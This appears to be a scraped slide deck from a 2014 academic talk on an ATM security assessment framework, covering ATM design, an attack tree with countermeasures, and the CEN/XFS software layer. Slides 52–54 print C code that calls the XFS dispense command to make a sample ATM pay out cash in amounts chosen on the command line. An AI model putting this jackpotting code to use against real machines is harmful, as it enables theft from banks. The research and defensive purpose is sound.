erik van buggenhout royal holloway university of london
play

Erik Van Buggenhout Royal Holloway, University of London Distance - PowerPoint PPT Presentation

Erik Van Buggenhout Royal Holloway, University of London Distance Learning Conference 2014 Information Security Consultant Instructor Incident Response, Penetration Testing SEC 560 & 542 Royal Holloway, University of London Project: ATM


  1. Erik Van Buggenhout Royal Holloway, University of London Distance Learning Conference 2014

  2. Information Security Consultant Instructor Incident Response, Penetration Testing SEC 560 & 542 Royal Holloway, University of London Project: ATM Security assessment framework

  3. § About the project § ATM Introduction § Attacking the ATM § Common ATM system design § Assessing a sample ATM § Conclusion

  4. § About the project § ATM Introduction § Attacking the ATM § Common ATM system design § Assessing a sample ATM § Conclusion

  5. § “A security assessment framework for Automated Teller Machines” § Finished it this year (2014) § Supervisor: Frederik Mennes

  6. § About the project § ATM Introduction § Attacking the ATM § Common ATM system design § Assessing a sample ATM § Conclusion

  7. § Automated Teller Machine § Cash disposing & dispensing § 2.2 million devices worldwide § Different hardware & software vendors

  8. The first ATM was installed in 1939 in New York City, known as “Bankograph”. Removed after 6 months because it was not used J It was reintroduced in Ohio in 1959, with huge success. There are currently more then 2.2 million ATM’s worldwide.

  9. The ATM is a “stupid” device, part of the bank’s overall architecture. It relies on back-end services for “important” decisions. PIN validation Account balance Transfer / withdrawal authorization ...

  10. Typical lay-out of a modern ATM 1. ATM computer 2. (Touch)screen 3. Card-reader 4. PIN pad 5. Cash dispenser 6. Cash cassettes

  11. 1. ATM computer 2. (Touch)screen 3. Card-reader 4. PIN pad 5. Cash dispenser 6. Cash cassettes

  12. 1. ATM computer 2. (Touch)screen 3. Card-reader 4. PIN pad 5. Cash dispenser 6. Cash cassettes

  13. 1. ATM computer Disk bays Disk bays 2. (Touch)screen 3. Card-reader CD / DVD CD / DVD 4. PIN pad 5. Cash dispenser Auxiliary ports 6. Cash cassettes USB

  14. § About the project § ATM Introduction § Attacking the ATM § Common ATM system design § Assessing a sample ATM § Conclusion

  15. It stores MONEY Handles interesting customer data as well, which could be abused to get MORE MONEY

  16. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  17. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  18. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  19. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  20. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  21. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  22. Safe certification standards, bolts, video surveillance...

  23. Ink cartridges that stain money upon breach

  24. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  25. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  26. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  27. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  28. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  29. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  30. Anti-skimming devices

  31. Security awareness campaigns

  32. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  33. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  34. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  35. Awareness + force change of default passwords

  36. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  37. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  38. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  39. Barnaby Jack Attack back-end Blow up the safe “ Jackpotting ATMs” - 2010 communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  40. Network access? Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode thing ...

  41. Network access? Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Shodan HQ (Internet search engine) lists 800+ ATMs Access available on the Internet Steal the entire “operator” mode thing ...

  42. Attack back-end Blow up the safe communication Copy cards & Attack the OS steal PIN codes Access Steal the entire “operator” mode CCC 2013 thing “Electronic bank robberies” Boot ATMs from USB ...

  43. § About the project § ATM Introduction § Attacking the ATM § Common ATM system design § Assessing a sample ATM § Conclusion

  44. CEN/XFS (eXtensions for Financial Services) provides a standard set of APIs that can be used by Windows applications to operate the ATM peripherals

  45. Operating System Windows-based application Vendor XFS APIs Independent XFS Manager CEN/XFS (eXtensions XFS SPIs for Financial Services) provides a standard set XFS Service Providers of APIs that can be used by Windows Vendor ATM peripheral Dependent applications to operate the ATM peripherals

  46. 95% of ATMs was running Windows XP in January 2014 (NCR, 2014)

  47. “How will you approach the Windows XP end-of-support?” (KAL 2013 – ATM Software Trends & Analysis)

  48. § About the project § ATM Introduction § Attacking the ATM § Common ATM system design § Assessing a sample ATM § Conclusion

  49. Attack failed

  50. Using openly available forensic toolkits we managed to recover the majority of the original hard disk content.

  51. Sweet... But I don’t have a bank back-end (yet)

  52. WFSOpen("CurrencyDispenser1", Set up XFS session with the WFS_DEFAULT_HAPP , "NVISOSPIT", “CurrencyDispenser1”, no WFS_TRACE_NONE, logging is required J WFS_INDEFINITE_WAIT , 0x0000FFFF , &serviceVersion, &spiVersion, &service); Create a dispense object “tDispense” WFSCDMDISPENSE tDispense; Create a denomination WFSCDMDENOMINATION tDenomination; object “tDenomination”

  53. tDispense.fwPosition =WFS_CDM_POSNULL; €€€ tDenomination.cCurrencyID[0]='E'; I want “EUR” J tDenomination.cCurrencyID[1]='U'; tDenomination.cCurrencyID[2]='R'; tDenomination.ulAmount=nviso_amount; The amount is specified dynamically by a command tDenomination.usCount=5; line argument tDenomination.ulCashBox=0; ulaValues[0] =nviso_cassette1; ulaValues[1] =nviso_cassette2; Specify how many notes you ulaValues[2] =0; want per cassette ulaValues[3] =0; ulaValues[4] =0;

  54. tDenomination.lpulValues = ulaValues; tDispense.lpDenomination= &tDenomination; HRESULT hResult = WFSExecute(service,WFS_CMD_CDM_DISPENSE,&tDispense,WFS_INDEFINIT E_WAIT ,&lpResult); Load the dispense with the specified denomination & execute the dispense operation

  55. TODO: Make it generic for different ATM devices (read custom config from registry J )

  56. DEMONSTRATION

  57. § About the project § ATM Introduction § Attacking the ATM § Common ATM system design § Assessing a sample ATM § Conclusion

Recommend


More recommend